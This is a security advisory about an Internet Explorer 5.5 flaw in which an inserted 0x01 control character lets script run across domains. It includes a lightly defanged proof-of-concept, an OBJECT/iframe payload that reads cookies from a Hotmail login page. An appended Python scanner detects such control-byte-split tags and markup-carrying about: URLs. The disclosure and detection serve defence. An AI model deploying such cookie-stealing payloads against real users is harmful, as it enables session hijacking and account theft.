When a 'square' (an undisplayable character, which is equal to the 1st character in the ASCII table) is inserted in some strategic position in JavaScript code, it is possible to access local files, the DOM of IFRAMEs, cookies from other domains and more.
Credit:
The information has been provided by Alp Sinan.
Vulnerable systems:
Microsoft Internet Explorer version 5.5
The original "%01" bug was discovered by Georgi Guninski. The bug affected various versions of IE and was patched later. It involved the usage of %01 to cause scripts to be executed, even when they should not.
The following code is an example of a new attack that is very similar to the previous one. The code will access the cookies of any domain:
(Before testing this code, replace '!' with 'i' in the script tag)
<OBJECT classid="clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389" width="1024" height="500">
<PARAM NAME="URL" value="about:<iframe id=box src='http://lc2.law5.hotmail.passport.com/cgi-bin/login' width='800' ></iframe><scr!pt>setTimeout('alert(\'your cookie from hotmail \'+box.document.cookie)',10000)</scr!pt> http://lc2.law5.hotmail.passport.com/cgi-bin/login">
</OBJECT>
Additional demonstrations can be found at http://horoznet.com/AlpSinan.
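The evasion the advisory describes is a control byte (0x01, the "square") splitting a tag name so that a filter looking for a literal "<script>" never sees one. The scanner below is an added example written for this page, not code from the advisory or its author; it flags tags that only become script/object/iframe after control bytes are stripped, and flags <param name="URL" value="about:..."> values that carry markup into an <object>. The sample HTML, the clsid and the host are constructed placeholders.

```python
import re

# Control bytes 0x00-0x1F; the advisory's "square" is 0x01, inserted so that
# <script> arrives as <scr\x01ipt> and slips past a naive literal-string filter.
CONTROL_CHARS = re.compile(r"[\x00-\x1f]")
TAG_NAME = re.compile(r"<\s*/?\s*([^\s>/]+)")
WATCHED = {"script", "object", "iframe", "embed", "applet"}
# <param name=URL value="about:..."> inside an <object>; the about: value may span '>'.
ABOUT_PARAM = re.compile(
    r'<param\s[^>]*name\s*=\s*["\']?url["\']?[^>]*value\s*=\s*(["\'])(about:.*?)\1',
    re.I | re.S,
)

def find_control_char_tags(html):
    """Tags whose name is a watched tag only once control bytes are removed."""
    findings = []
    for m in TAG_NAME.finditer(html):
        raw = m.group(1)
        if CONTROL_CHARS.search(raw):
            cleaned = CONTROL_CHARS.sub("", raw).lower()
            if cleaned in WATCHED:
                findings.append({"offset": m.start(), "raw": raw, "normalized": cleaned})
    return findings

def find_about_url_params(html):
    """about: URL values that smuggle markup (an iframe, a script) into an <object>."""
    return [m.group(2) for m in ABOUT_PARAM.finditer(html) if "<" in m.group(2)]

def scan(html):
    return {"control_char_tags": find_control_char_tags(html),
            "about_url_params": find_about_url_params(html)}

# Constructed sample mirroring the advisory's structure (placeholder clsid and host).
SAMPLE = (
    '<OBJECT classid="clsid:00000000-0000-0000-0000-000000000000">'
    '<PARAM NAME="URL" value="about:<iframe id=box src=\'http://example.invalid/\'>'
    '</iframe><scr\x01ipt>alert(box.document.cookie)</scr\x01ipt>">'
    '</OBJECT><script>var ok = 1;</script>'
)

if __name__ == "__main__":
    for f in find_control_char_tags(SAMPLE):
        print(f"offset {f['offset']}: {f['raw']!r} normalizes to <{f['normalized']}>")
    for v in find_about_url_params(SAMPLE):
        print("about: URL carrying markup:", v[:40] + "...")
```

Percent-encoded input ("%01" in a URL) should be decoded before scanning, since the check works on raw bytes.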